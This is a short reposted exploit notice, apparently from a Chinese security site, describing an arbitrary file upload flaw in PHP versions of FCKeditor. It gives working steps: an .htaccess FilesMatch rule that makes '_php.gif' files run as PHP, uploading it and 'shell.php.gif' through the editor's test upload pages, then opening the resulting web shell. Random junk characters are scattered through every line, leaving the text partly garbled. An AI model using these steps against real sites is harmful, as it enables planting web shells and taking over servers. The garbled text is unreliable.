FCKeditor所有php版本Upload上传漏洞' R+ g" T) U5 Q
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07, R; v. F4 d2 I) [
减小字体 增大字体; H2 c, I3 m N# n2 k+ y/ k
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
; S$ v& @# j" t) {' G4 t" f/ \[+] Date: 2011
: l; Y9 v6 h7 ]+ p# n n1 p[+] Author : sinesafe.cn
" ~# e3 j, h x" ?# N[+] Website : WwW.sinesafe.cn$ `# u* }1 F- }9 M
———————————————————
1 w/ x+ B0 U7 O$ R, m1.create a htaccess file:. Y( [* H5 j. q9 K7 N
code:5 M1 Z4 B# U6 k4 p# N: m
<FilesMatch “_php.gif”>
- q9 B# Z& o" K9 FSetHandler application/x-httpd-php
3 y1 @: u0 i+ O$ ?& O- A% r- q6 v</FilesMatch>
; y/ A& j" K1 N' N% P5 v
# m# Z I8 M6 }; W c0 ^1 Q2.Now upload this htaccess with FCKeditor.
" h* \% }; u0 w/ z5 I$ b& M4 K2 e) x, y# `% Q
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html% ? l/ D l1 P& L, w% {0 C
/ w2 ?: k" T1 ]# _1 H& zhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html3 `3 n f" z' y% N7 c8 I+ J
4 E. F. u- m+ M0 S———————————————————————————————-
_" l) {, U# y# w2 m+ j, d3.Now upload shell.php.gif with FCKeditor.
2 a8 C4 h& |, Y* \# X3 G4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.8 S g8 F; C# L, S$ M
5.http://www.sinesafe.cn/anything/shell_php.gif
0 `! y% g0 j1 }$ T6.Now shell is available from server. | 1 @, |/ _. p8 B1 x1 ?9 i+ D
/ Z0 c [4 [" w& X8 ?" y: R
3 {# Z7 _6 X' i. o- P( Z |